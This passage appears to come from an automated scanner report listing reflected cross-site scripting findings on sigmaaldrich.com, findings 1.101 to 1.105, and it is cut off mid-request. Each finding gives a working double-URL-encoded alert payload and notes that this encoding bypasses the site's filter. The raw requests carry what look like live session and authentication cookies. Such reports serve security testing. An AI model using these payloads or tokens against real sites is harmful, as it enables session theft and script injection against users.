Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich46b3b";alert(1)//4dfd3aae0d8/areas-of-interest/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.101. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72b7a%2522%253balert%25281%2529%252f%252f26ba52d9125 was submitted in the REST URL parameter 3. This input was echoed as 72b7a";alert(1)//26ba52d9125 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest72b7a%2522%253balert%25281%2529%252f%252f26ba52d9125/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest72b7a";alert(1)//26ba52d9125/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.102. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53984%2522%253balert%25281%2529%252f%252fe172f22c51a was submitted in the REST URL parameter 4. This input was echoed as 53984";alert(1)//e172f22c51a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/labware53984%2522%253balert%25281%2529%252f%252fe172f22c51a/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/labware53984";alert(1)//e172f22c51a/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.103. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc4ef%2522%253balert%25281%2529%252f%252fb1741c0c7a1 was submitted in the REST URL parameter 5. This input was echoed as bc4ef";alert(1)//b1741c0c7a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/labware/labware-catalogbc4ef%2522%253balert%25281%2529%252f%252fb1741c0c7a1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/labware/labware-catalogbc4ef";alert(1)//b1741c0c7a1","E404") ;
   </script>
...[SNIP]...

1.104. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed65a%2522%253balert%25281%2529%252f%252fc4bf42e1856 was submitted in the REST URL parameter 1. This input was echoed as ed65a";alert(1)//c4bf42e1856 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contented65a%2522%253balert%25281%2529%252f%252fc4bf42e1856/sigma-aldrich/areas-of-interest/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contented65a";alert(1)//c4bf42e1856/sigma-aldrich/areas-of-interest/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.105. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49565%2522%253balert%25281%2529%252f%252f76b01f700a7 was submitted in the REST URL parameter 2. This input was echoed as 49565";alert(1)//76b01f700a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich49565%2522%253balert%25281%2529%252f%252f76b01f700a7/areas-of-interest/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
